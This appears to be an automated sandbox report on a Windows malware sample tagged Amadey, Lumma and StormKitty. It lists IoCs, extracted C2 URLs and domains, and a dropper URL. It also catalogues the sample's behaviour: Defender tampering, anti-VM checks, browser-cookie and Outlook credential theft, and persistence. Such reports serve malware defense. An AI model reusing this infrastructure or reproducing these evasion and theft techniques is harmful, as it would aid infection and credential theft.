amadey | a2acf5edfa7fd31d1c407418792b416f2727f009aa3dc0d3e4c9625bd04f5ade

Analysis

max time kernel
74s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20250314-en
resource tags

arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
submitted
31/03/2025, 09:41

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2025-03-31_15b187760f4551f2a6827099467de67e_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
Size

938KB
MD5

15b187760f4551f2a6827099467de67e
SHA1

40ef889494aaedd66d8d08eb020cbbfd412f9b72
SHA256

a2acf5edfa7fd31d1c407418792b416f2727f009aa3dc0d3e4c9625bd04f5ade
SHA512

4f4ba88fa44f952c55917364a7072204ac3357ebc47c5844964eb9cf835cd8f867dd014fcc1fee2a1e19956ddac1947763cc8ffe811a357602ac8e63ff0c5f00
SSDEEP

24576:qqDEvCTbMWu7rQYlBQcBiT6rprG8a48u:qTvC/MTQYxsWR7a48

Score

10^/10

amadey lumma stormkitty 092155 collection credential_access defense_evasion discovery execution exploit persistence privilege_escalation spyware stealer trojan upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

http://176.113.115.6

Attributes

install_dir
bb556cff4a
install_file
rapes.exe
strings_key
a131b127e996a898cd19ffb2d92e481b
url_paths
/Ni9kiput/index.php

rc4.plain

Extracted

Family

lumma

https://cosmosyf.top/GOsznj

https://esccapewz.run/ANSbwqy

https://travewlio.shop/ZNxbHi

https://touvrlane.bet/ASKwjq

https://sighbtseeing.shop/ASJnzh

https://advennture.top/GKsiio

https://targett.top/dsANGt

https://holidamyup.today/AOzkns

https://triplooqp.world/APowko

https://skynetxc.live/AksoPA

https://byteplusx.digital/aXweAX

https://apixtreev.run/LkaUz

https://tsparkiob.digital/KeASUp

https://appgridn.live/LEjdAK

https://rodformi.run/aUosoz

https://metalsyo.digital/opsa

https://ironloxp.live/aksdd

https://navstarx.shop/FoaJSi

https://starcloc.bet/GOksAo

https://spacedbv.world/EKdlsk

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey
Amadey family
amadey
Lumma Stealer, LummaC
Lumma or LummaC is an infostealer written in C++ first seen in August 2022.
stealer lumma
Lumma family
lumma

Modifies security service 2 TTPs 2 IoCs

defense_evasion

Modify Registry

T1112

Windows Service

T1543.003

description	ioc	Process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Security	reg.exe

StormKitty
StormKitty is an open source info stealer written in C#.
stealer stormkitty

StormKitty payload 1 IoCs

resource	yara_rule
behavioral1/memory/3356-355-0x0000000000400000-0x0000000000444000-memory.dmp	family_stormkitty

Stormkitty family
stormkitty

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 4600 created 3516	4600	FOm9tvc.exe	56

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 3 IoCs

defense_evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Temp3011QWQQIZVBEPTOOR2SO3WRTQIK8UTU.EXE
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe

Blocklisted process makes network request 1 IoCs

flow	pid	Process
13	1480	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 9 IoCs

Run Powershell to execute payload.

execution

PowerShell

T1059.001

pid	Process
2220	powershell.exe
2336	powershell.exe
4120	PowerShell.exe
1480	powershell.exe
2876	powershell.exe
1668	powershell.exe
2840	powershell.exe
4288	powershell.exe
5908	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002

Downloads MZ/PE file 15 IoCs

flow	pid	Process
13	1480	powershell.exe
83	2316	futors.exe
86	2316	futors.exe
48	2316	futors.exe
48	2316	futors.exe
27	4692	rapes.exe
101	4692	rapes.exe
33	4692	rapes.exe
33	4692	rapes.exe
120	4692	rapes.exe
120	4692	rapes.exe
120	4692	rapes.exe
120	4692	rapes.exe
120	4692	rapes.exe
35	2316	futors.exe

Possible privilege escalation attempt 2 IoCs

exploit

pid	Process
4744	takeown.exe
4124	icacls.exe

Stops running service(s) 4 TTPs
defense_evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Uses browser remote debugging 2 TTPs 4 IoCs

Can be used control the browser and steal sensitive information such as credentials and session cookies.

credential_access stealer

Steal Web Session Cookie

T1539

Modify Authentication Process

T1556

pid	Process
4212	chrome.exe
5152	chrome.exe
4184	chrome.exe
3636	chrome.exe

Checks BIOS information in registry 2 TTPs 6 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Temp3011QWQQIZVBEPTOOR2SO3WRTQIK8UTU.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Temp3011QWQQIZVBEPTOOR2SO3WRTQIK8UTU.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe

Checks computer location settings 2 TTPs 11 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\Control Panel\International\Geo\Nation	rapes.exe
Key value queried	\REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\Control Panel\International\Geo\Nation	amnew.exe
Key value queried	\REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\Control Panel\International\Geo\Nation	futors.exe
Key value queried	\REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\Control Panel\International\Geo\Nation	apple.exe
Key value queried	\REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\Control Panel\International\Geo\Nation	Bell_Setup16.tmp
Key value queried	\REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\Control Panel\International\Geo\Nation	bprz1VA.exe
Key value queried	\REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\Control Panel\International\Geo\Nation	gLLOqKC.exe
Key value queried	\REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\Control Panel\International\Geo\Nation	221.exe
Key value queried	\REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\Control Panel\International\Geo\Nation	221.exe
Key value queried	\REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\Control Panel\International\Geo\Nation	Temp3011QWQQIZVBEPTOOR2SO3WRTQIK8UTU.EXE

Executes dropped EXE 26 IoCs

pid	Process
3764	Temp3011QWQQIZVBEPTOOR2SO3WRTQIK8UTU.EXE
4692	rapes.exe
4588	amnew.exe
2316	futors.exe
2324	gLLOqKC.exe
4992	a5.exe
5072	v7942.exe
2380	apple.exe
3644	221.exe
1340	221.exe
1584	alex1dskfmdsf.exe
4100	futors.exe
2920	rapes.exe
4980	Bell_Setup16.exe
2004	Bell_Setup16.tmp
3884	Bell_Setup16.exe
5112	Bell_Setup16.tmp
4072	bot.exe
1400	bot.exe
4600	FOm9tvc.exe
4684	kololololo.exe
2416	bprz1VA.exe
4736	wow_6262_build (9).exe
4148	Built.exe
3044	Luma_Crypt_Packlab.exe
3212	Built.exe

Identifies Wine through registry keys 2 TTPs 3 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

defense_evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\Software\Wine	Temp3011QWQQIZVBEPTOOR2SO3WRTQIK8UTU.EXE
Key opened	\REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\Software\Wine	rapes.exe

Loads dropped DLL 19 IoCs

pid	Process
4992	a5.exe
532	regsvr32.exe
3212	Built.exe
3212	Built.exe
3212	Built.exe
3212	Built.exe
3212	Built.exe
3212	Built.exe
3212	Built.exe
3212	Built.exe
3212	Built.exe
3212	Built.exe
3212	Built.exe
3212	Built.exe
3212	Built.exe
3212	Built.exe
3212	Built.exe
3212	Built.exe
3212	Built.exe

Modifies file permissions 1 TTPs 2 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
4744	takeown.exe
4124	icacls.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegAsm.exe
Key opened	\REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegAsm.exe
Key opened	\REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegAsm.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Looks up external IP address via web service 3 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
121	ip-api.com
94	ipinfo.io
95	ipinfo.io

Enumerates processes with tasklist 1 TTPs 3 IoCs

discovery

Process Discovery

T1057

pid	Process
3588	tasklist.exe
1620	tasklist.exe
4476	tasklist.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs

pid	Process
3764	Temp3011QWQQIZVBEPTOOR2SO3WRTQIK8UTU.EXE
4692	rapes.exe
2920	rapes.exe

Suspicious use of SetThreadContext 5 IoCs

description	pid	Process	procid_target
PID 1584 set thread context of 2584	1584	alex1dskfmdsf.exe	187
PID 4600 set thread context of 3356	4600	FOm9tvc.exe	216
PID 4684 set thread context of 2428	4684	kololololo.exe	254
PID 4736 set thread context of 3624	4736	wow_6262_build (9).exe	234
PID 3044 set thread context of 4684	3044	Luma_Crypt_Packlab.exe	235

UPX packed file 37 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x000700000002412f-612.dat	upx
behavioral1/memory/3212-621-0x00007FF829C10000-0x00007FF829C3D000-memory.dmp	upx
behavioral1/memory/3212-620-0x00007FF82ABE0000-0x00007FF82ABF9000-memory.dmp	upx
behavioral1/memory/3212-619-0x00007FF83D670000-0x00007FF83D67F000-memory.dmp	upx
behavioral1/memory/3212-618-0x00007FF82AC00000-0x00007FF82AC24000-memory.dmp	upx
behavioral1/memory/3212-614-0x00007FF8289D0000-0x00007FF828FC0000-memory.dmp	upx
behavioral1/memory/3212-630-0x00007FF829BE0000-0x00007FF829C03000-memory.dmp	upx
behavioral1/memory/3212-631-0x00007FF829A60000-0x00007FF829BD6000-memory.dmp	upx
behavioral1/memory/3212-633-0x00007FF83D660000-0x00007FF83D66D000-memory.dmp	upx
behavioral1/memory/3212-636-0x00007FF8284A0000-0x00007FF8289C9000-memory.dmp	upx
behavioral1/memory/3212-637-0x00007FF829930000-0x00007FF8299FD000-memory.dmp	upx
behavioral1/memory/3212-639-0x00007FF829910000-0x00007FF829924000-memory.dmp	upx
behavioral1/memory/3212-638-0x00007FF8289D0000-0x00007FF828FC0000-memory.dmp	upx
behavioral1/memory/3212-643-0x00007FF8297F0000-0x00007FF82990C000-memory.dmp	upx
behavioral1/memory/3212-642-0x00007FF82AC00000-0x00007FF82AC24000-memory.dmp	upx
behavioral1/memory/3212-640-0x00007FF8395E0000-0x00007FF8395ED000-memory.dmp	upx
behavioral1/memory/3212-635-0x00007FF829A00000-0x00007FF829A33000-memory.dmp	upx
behavioral1/memory/3212-632-0x00007FF829A40000-0x00007FF829A59000-memory.dmp	upx
behavioral1/memory/3212-675-0x00007FF829A60000-0x00007FF829BD6000-memory.dmp	upx
behavioral1/memory/3212-674-0x00007FF829BE0000-0x00007FF829C03000-memory.dmp	upx
behavioral1/memory/3212-731-0x00007FF83D660000-0x00007FF83D66D000-memory.dmp	upx
behavioral1/memory/3212-749-0x00007FF8395E0000-0x00007FF8395ED000-memory.dmp	upx
behavioral1/memory/3212-747-0x00007FF829930000-0x00007FF8299FD000-memory.dmp	upx
behavioral1/memory/3212-741-0x00007FF829BE0000-0x00007FF829C03000-memory.dmp	upx
behavioral1/memory/3212-730-0x00007FF829A40000-0x00007FF829A59000-memory.dmp	upx
behavioral1/memory/3212-754-0x00007FF82ABE0000-0x00007FF82ABF9000-memory.dmp	upx
behavioral1/memory/3212-755-0x00007FF8289D0000-0x00007FF828FC0000-memory.dmp	upx
behavioral1/memory/3212-753-0x00007FF83D670000-0x00007FF83D67F000-memory.dmp	upx
behavioral1/memory/3212-752-0x00007FF82AC00000-0x00007FF82AC24000-memory.dmp	upx
behavioral1/memory/3212-751-0x00007FF829C10000-0x00007FF829C3D000-memory.dmp	upx
behavioral1/memory/3212-750-0x00007FF8297F0000-0x00007FF82990C000-memory.dmp	upx
behavioral1/memory/3212-748-0x00007FF829910000-0x00007FF829924000-memory.dmp	upx
behavioral1/memory/3212-746-0x00007FF8284A0000-0x00007FF8289C9000-memory.dmp	upx
behavioral1/memory/3212-745-0x00007FF829A00000-0x00007FF829A33000-memory.dmp	upx
behavioral1/memory/3212-744-0x00007FF83D660000-0x00007FF83D66D000-memory.dmp	upx
behavioral1/memory/3212-743-0x00007FF829A40000-0x00007FF829A59000-memory.dmp	upx
behavioral1/memory/3212-742-0x00007FF829A60000-0x00007FF829BD6000-memory.dmp	upx

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Windows Defender\es-ES\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\fr-FR\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\it-IT\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\de-DE\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\es-ES\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\fr-FR\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\uk-UA\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\ja-JP\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\uk-UA\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\es-ES\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\it-IT\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\ja-JP\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\de-DE\EppManifest.dll.mui	cmd.exe

Drops file in Windows directory 2 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\rapes.job	Temp3011QWQQIZVBEPTOOR2SO3WRTQIK8UTU.EXE
File created	C:\Windows\Tasks\futors.job	amnew.exe

Launches sc.exe 38 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
376	sc.exe
1008	sc.exe
2276	sc.exe
3492	sc.exe
4468	sc.exe
4032	sc.exe
448	sc.exe
3868	sc.exe
4080	sc.exe
3232	sc.exe
4320	sc.exe
3964	sc.exe
1120	sc.exe
2840	sc.exe
3912	sc.exe
1600	sc.exe
3148	sc.exe
708	sc.exe
4452	sc.exe
4116	sc.exe
4120	sc.exe
4032	sc.exe
2572	sc.exe
4832	sc.exe
4776	sc.exe
4184	sc.exe
4928	sc.exe
4600	sc.exe
1592	sc.exe
4448	sc.exe
3120	sc.exe
4108	sc.exe
3244	sc.exe
1328	sc.exe
2484	sc.exe
1652	sc.exe
2492	sc.exe
3296	sc.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe

Program crash 1 IoCs

pid	pid_target	Process	procid_target
5040	4888	WerFault.exe	302

System Location Discovery: System Language Discovery 1 TTPs 36 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	apple.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Bell_Setup16.tmp
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegAsm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	221.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	amnew.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Bell_Setup16.tmp
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	chcp.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	2025-03-31_15b187760f4551f2a6827099467de67e_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Temp3011QWQQIZVBEPTOOR2SO3WRTQIK8UTU.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	futors.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Bell_Setup16.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	regsvr32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	a5.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	221.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	bprz1VA.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	gLLOqKC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Bell_Setup16.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	chcp.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PowerShell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	FOm9tvc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rapes.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
880	cmd.exe
2748	netsh.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0	RegAsm.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	RegAsm.exe

Delays execution with timeout.exe 1 IoCs

defense_evasion

pid	Process
2264	timeout.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
4392	schtasks.exe
7288	schtasks.exe
7548	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1480	powershell.exe
1480	powershell.exe
3764	Temp3011QWQQIZVBEPTOOR2SO3WRTQIK8UTU.EXE
3764	Temp3011QWQQIZVBEPTOOR2SO3WRTQIK8UTU.EXE
4692	rapes.exe
4692	rapes.exe
4992	a5.exe
4992	a5.exe
4992	a5.exe
4992	a5.exe
4992	a5.exe
4992	a5.exe
4992	a5.exe
4992	a5.exe
4992	a5.exe
4992	a5.exe
4992	a5.exe
4992	a5.exe
4992	a5.exe
4992	a5.exe
4992	a5.exe
4992	a5.exe
4992	a5.exe
4992	a5.exe
4992	a5.exe
4992	a5.exe
4992	a5.exe
4992	a5.exe
4992	a5.exe
4992	a5.exe
4992	a5.exe
4992	a5.exe
4992	a5.exe
4992	a5.exe
4992	a5.exe
4992	a5.exe
4992	a5.exe
4992	a5.exe
4992	a5.exe
4992	a5.exe
4992	a5.exe
4992	a5.exe
4992	a5.exe
4992	a5.exe
4992	a5.exe
4992	a5.exe
4992	a5.exe
4992	a5.exe
4992	a5.exe
4992	a5.exe
4992	a5.exe
4992	a5.exe
4992	a5.exe
4992	a5.exe
4992	a5.exe
4992	a5.exe
4992	a5.exe
4992	a5.exe
4992	a5.exe
4992	a5.exe
4992	a5.exe
4992	a5.exe
4992	a5.exe
4992	a5.exe

Suspicious behavior: LoadsDriver 2 IoCs

pid	Process
656	Process not Found
656	Process not Found

Suspicious use of AdjustPrivilegeToken 64 IoCs

